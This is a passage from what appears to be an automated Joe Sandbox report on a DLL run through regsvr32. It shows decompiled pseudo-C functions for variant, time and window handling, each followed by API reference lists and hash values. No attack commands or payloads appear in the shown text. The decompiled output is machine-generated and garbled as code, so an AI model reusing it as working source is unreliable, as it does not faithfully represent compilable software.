                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									L47:
                                                                                                            									_t170 = E1000E754(_t327 - 0x28, __eflags);
                                                                                                            									 *((char*)(_t327 - 4)) = 4;
                                                                                                            									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
                                                                                                            									 *((char*)(_t327 - 4)) = 5;
                                                                                                            									E10010578(_t172, _t327 - 0x40, _t172);
                                                                                                            									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            									_t276 =  *((intOrPtr*)(_t327 - 0x28));
                                                                                                            									L48:
                                                                                                            									__eflags = _t276 + 0xfffffff0;
                                                                                                            									 *((char*)(_t327 - 4)) = 0;
                                                                                                            									E100014B0(_t276 + 0xfffffff0, _t318);
                                                                                                            								} else {
                                                                                                            									_t243 = _t167;
                                                                                                            									__eflags = _t243;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										L24:
                                                                                                            										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
                                                                                                            										 *((char*)(_t327 - 4)) = 7;
                                                                                                            										E10010578(_t237, _t327 - 0x40, _t237);
                                                                                                            										_t186 = _t327 - 0x110;
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										_t244 = _t243 - 1;
                                                                                                            										__eflags = _t244;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											L23:
                                                                                                            											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
                                                                                                            											 *((char*)(_t327 - 4)) = 8;
                                                                                                            											E10010578(_t240, _t327 - 0x40, _t240);
                                                                                                            											_t186 = _t327 - 0xe0;
                                                                                                            											goto L36;
                                                                                                            										} else {
                                                                                                            											_t245 = _t244 - 1;
                                                                                                            											__eflags = _t245;
                                                                                                            											if(__eflags == 0) {
                                                                                                            												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            												 *((short*)(_t327 - 0xc0)) = 4;
                                                                                                            												 *((char*)(_t327 - 4)) = 9;
                                                                                                            												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
                                                                                                            												_t186 = _t327 - 0xc0;
                                                                                                            												goto L36;
                                                                                                            											} else {
                                                                                                            												_t249 = _t245 - 1;
                                                                                                            												__eflags = _t249;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            													 *((short*)(_t327 - 0x90)) = 5;
                                                                                                            													 *((char*)(_t327 - 4)) = 0xa;
                                                                                                            													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
                                                                                                            													_t186 = _t327 - 0x90;
                                                                                                            													goto L36;
                                                                                                            												} else {
                                                                                                            													_t253 = _t249 - 1;
                                                                                                            													__eflags = _t253;
                                                                                                            													if(__eflags == 0) {
                                                                                                            														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                                                            														 *((short*)(_t327 - 0x50)) = 6;
                                                                                                            														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
                                                                                                            														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
                                                                                                            														 *((char*)(_t327 - 4)) = 0xd;
                                                                                                            														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
                                                                                                            														_t186 = _t327 - 0x50;
                                                                                                            														goto L36;
                                                                                                            													} else {
                                                                                                            														__eflags = _t253 - 1;
                                                                                                            														if(__eflags == 0) {
                                                                                                            															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            															 *((short*)(_t327 - 0xd0)) = 7;
                                                                                                            															 *((char*)(_t327 - 4)) = 0xc;
                                                                                                            															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
                                                                                                            															_t186 = _t327 - 0xd0;
                                                                                                            															L36:
                                                                                                            															 *((char*)(_t327 - 4)) = 0;
                                                                                                            															 *_t326(_t186);
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                                                            					 *_t326(_t327 - 0x40);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
                                                                                                            				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
                                                                                                            			}



































                                                                                                            0x1000ed9d
                                                                                                            0x1000ed96
                                                                                                            0x1000ed8f
                                                                                                            0x1000ed88
                                                                                                            0x1000ed80
                                                                                                            0x1000ed7a
                                                                                                            0x1000ed71
                                                                                                            0x1000f1e9
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1f2
                                                                                                            0x1000f1fc
                                                                                                            0x1000f20d

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                            • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                              • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2075586698-0
                                                                                                            • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                                                            • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                              • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                                                              • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                                                              • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                              • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                              • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                              • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • GetWindowRect.USER32 ref: 10030BDC
                                                                                                              • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                              • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • GetWindowRect.USER32 ref: 10030CA6
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                                                              • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                                                              • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                                                              • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                                                              • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                                                            • GetWindowRect.USER32 ref: 10030D79
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2136250054-0
                                                                                                            • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                                                            • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				void* _t72;
                                                                                                            				intOrPtr _t74;
                                                                                                            				char _t75;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t86;
                                                                                                            				intOrPtr _t90;
                                                                                                            				intOrPtr* _t92;
                                                                                                            				intOrPtr _t94;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr _t102;
                                                                                                            				char _t105;
                                                                                                            				signed int _t111;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t118;
                                                                                                            				intOrPtr* _t121;
                                                                                                            				void* _t127;
                                                                                                            				intOrPtr _t128;
                                                                                                            				intOrPtr* _t129;
                                                                                                            				intOrPtr _t132;
                                                                                                            				void* _t134;
                                                                                                            				intOrPtr _t136;
                                                                                                            				intOrPtr _t138;
                                                                                                            
                                                                                                            				_t118 = __edx;
                                                                                                            				_t121 = _a4;
                                                                                                            				_t101 =  *((intOrPtr*)(_t121 + 4));
                                                                                                            				_t62 =  *_t121;
                                                                                                            				_t132 = _t101;
                                                                                                            				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
                                                                                                            					L29:
                                                                                                            					_t63 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					goto L30;
                                                                                                            				} else {
                                                                                                            					_t134 = _t101 - 0x1000;
                                                                                                            					if(_t134 > 0) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					if(_t134 < 0) {
                                                                                                            						L6:
                                                                                                            						_push(_t127);
                                                                                                            						E100193FB(_t127, _t135);
                                                                                                            						_t102 =  *((intOrPtr*)(_t121 + 4));
                                                                                                            						_t136 = _t102;
                                                                                                            						_t128 =  *_t121;
                                                                                                            						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
                                                                                                            							_t65 = E10018BEF(_t121);
                                                                                                            							__eflags =  *0x1004cdec; // 0x1
                                                                                                            							_t129 = _t65;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								L15:
                                                                                                            								asm("cdq");
                                                                                                            								_t67 =  *0x1004cde8; // 0x7080
                                                                                                            								_t123 = _t118;
                                                                                                            								asm("cdq");
                                                                                                            								_t105 =  *_t129 - _t67;
                                                                                                            								__eflags = _t105;
                                                                                                            								asm("sbb edi, edx");
                                                                                                            								_v12 = _t105;
                                                                                                            								_v8 = _t118;
                                                                                                            								L16:
                                                                                                            								_t68 = E10019490(_t105, _t123, 0x3c, 0);
                                                                                                            								__eflags = _t68;
                                                                                                            								 *_t129 = _t68;
                                                                                                            								if(_t68 < 0) {
                                                                                                            									 *_t129 = _t68 + 0x3c;
                                                                                                            									_v12 = _v12 + 0xffffffc4;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t69 = E10013780(_v12, _v8, 0x3c, 0);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edi, edx");
                                                                                                            								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
                                                                                                            								_v8 = _t118;
                                                                                                            								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
                                                                                                            								__eflags = _t71;
                                                                                                            								 *((intOrPtr*)(_t129 + 4)) = _t71;
                                                                                                            								if(_t71 < 0) {
                                                                                                            									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
                                                                                                            									_v12 = _v12 + 0xffffffc4;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t72 = E10013780(_v12, _v8, 0x3c, 0);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edi, edx");
                                                                                                            								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
                                                                                                            								_v8 = _t118;
                                                                                                            								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
                                                                                                            								__eflags = _t74;
                                                                                                            								 *((intOrPtr*)(_t129 + 8)) = _t74;
                                                                                                            								if(_t74 < 0) {
                                                                                                            									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
                                                                                                            									_v12 = _v12 + 0xffffffe8;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t75 = E10013780(_v12, _v8, 0x18, 0);
                                                                                                            								__eflags = _t118;
                                                                                                            								_v12 = _t75;
                                                                                                            								_v8 = _t118;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									goto L28;
                                                                                                            								} else {
                                                                                                            									if(__eflags < 0) {
                                                                                                            										L25:
                                                                                                            										asm("cdq");
                                                                                                            										_t111 = 7;
                                                                                                            										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
                                                                                                            										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
                                                                                                            										_t79 =  *((intOrPtr*)(_t129 + 0xc));
                                                                                                            										__eflags = _t79;
                                                                                                            										if(_t79 > 0) {
                                                                                                            											_t60 = _t129 + 0x1c;
                                                                                                            											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
                                                                                                            											__eflags =  *_t60;
                                                                                                            										} else {
                                                                                                            											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
                                                                                                            											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
                                                                                                            											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
                                                                                                            											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
                                                                                                            										}
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									__eflags = _t75;
                                                                                                            									if(_t75 >= 0) {
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_push(_t129);
                                                                                                            							_t85 = E10019447(0, _t121, _t129, __eflags);
                                                                                                            							__eflags = _t85;
                                                                                                            							if(_t85 == 0) {
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							_t113 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            							_t86 =  *0x1004cde8; // 0x7080
                                                                                                            							asm("cdq");
                                                                                                            							asm("cdq");
                                                                                                            							asm("sbb edx, edi");
                                                                                                            							_v12 =  *_t129 - _t86 + _t113;
                                                                                                            							_v8 = _t118;
                                                                                                            							 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                                                            							_t123 = _v8;
                                                                                                            							_t105 = _v12;
                                                                                                            							goto L16;
                                                                                                            						} else {
                                                                                                            							_t90 =  *0x1004cde8; // 0x7080
                                                                                                            							asm("cdq");
                                                                                                            							asm("sbb ecx, edx");
                                                                                                            							_v12 = _t128 - _t90;
                                                                                                            							_v8 = _t102;
                                                                                                            							_t92 = E10018BEF( &_v12);
                                                                                                            							_t138 =  *0x1004cdec; // 0x1
                                                                                                            							_t129 = _t92;
                                                                                                            							if(_t138 != 0) {
                                                                                                            								_push(_t129);
                                                                                                            								if(E10019447(0, _t121, _t129, _t138) != 0) {
                                                                                                            									_t94 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            									asm("cdq");
                                                                                                            									_v12 = _v12 - _t94;
                                                                                                            									asm("sbb [ebp-0x4], edx");
                                                                                                            									_t129 = E10018BEF( &_v12);
                                                                                                            									 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L28:
                                                                                                            							_t63 = _t129;
                                                                                                            							L30:
                                                                                                            							return _t63;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t135 = _t62;
                                                                                                            					if(_t62 > 0) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}


                                                                                                            APIs
                                                                                                              • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __allrem.LIBCMT ref: 100135FA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                                                            • __allrem.LIBCMT ref: 10013637
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                                                            • __allrem.LIBCMT ref: 10013676
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                                                              • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282128132-0
                                                                                                            • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                                                            • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                                                            • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E1000F210(void* __ecx, void* __edx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t73;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				intOrPtr* _t92;
                                                                                                            				intOrPtr* _t94;
                                                                                                            				void* _t99;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t110;
                                                                                                            				intOrPtr _t122;
                                                                                                            				void* _t124;
                                                                                                            				void* _t126;
                                                                                                            				void* _t128;
                                                                                                            				void* _t129;
                                                                                                            
                                                                                                            				_t117 = __edx;
                                                                                                            				E10011BF0(0x1003b066, _t126);
                                                                                                            				_t129 = _t128 - 0x6c;
                                                                                                            				_t73 = 0;
                                                                                                            				_t124 = __ecx;
                                                                                                            				 *((intOrPtr*)(__ecx + 0x44)) = 1;
                                                                                                            				 *(_t126 - 0x10) = 0;
                                                                                                            				 *(_t126 - 0x18) = 0;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
                                                                                                            					L21:
                                                                                                            					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					_t104 = _t73 + _t73 * 4 << 3;
                                                                                                            					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
                                                                                                            					if(_t109 == 0) {
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            					_t110 =  *((intOrPtr*)(_t109 + 4));
                                                                                                            					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
                                                                                                            					if(_t110 == 0) {
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
                                                                                                            					do {
                                                                                                            						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
                                                                                                            						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
                                                                                                            						E10011C50(_t126 - 0x78, 0, 0x20);
                                                                                                            						_t129 = _t129 + 0xc;
                                                                                                            						E10010592(_t126 - 0x48);
                                                                                                            						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                                                                                            						_t135 =  *((intOrPtr*)(_t124 + 0x48));
                                                                                                            						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
                                                                                                            							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
                                                                                                            							__eflags = _t85;
                                                                                                            						} else {
                                                                                                            							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
                                                                                                            							 *(_t126 - 4) = 1;
                                                                                                            							E10010578(_t99, _t126 - 0x48, _t99);
                                                                                                            							 *(_t126 - 4) = 0;
                                                                                                            							__imp__#9(_t126 - 0x58);
                                                                                                            							_t85 = _t126 - 0x48;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x30)) = 1;
                                                                                                            						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
                                                                                                            						 *(_t122 + 0x84) = 1;
                                                                                                            						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
                                                                                                            						if(_t89 != 0) {
                                                                                                            							_t117 = _t126 - 0x1c;
                                                                                                            							_push(_t126 - 0x1c);
                                                                                                            							_push(0x10043098);
                                                                                                            							_push(_t89);
                                                                                                            							if( *((intOrPtr*)( *_t89))() >= 0) {
                                                                                                            								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                                                            								_t117 = _t126 - 0x38;
                                                                                                            								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
                                                                                                            								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
                                                                                                            								 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                                                            								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
                                                                                                            									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
                                                                                                            								}
                                                                                                            								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
                                                                                                            								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                                                                                                            						__imp__#9(_t126 - 0x48);
                                                                                                            					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
                                                                                                            					_t73 =  *(_t126 - 0x18);
                                                                                                            					L19:
                                                                                                            					_t73 = _t73 + 1;
                                                                                                            					 *(_t126 - 0x18) = _t73;
                                                                                                            				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
                                                                                                            				goto L21;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000F215
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                                                              • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                              • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098219910-0
                                                                                                            • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
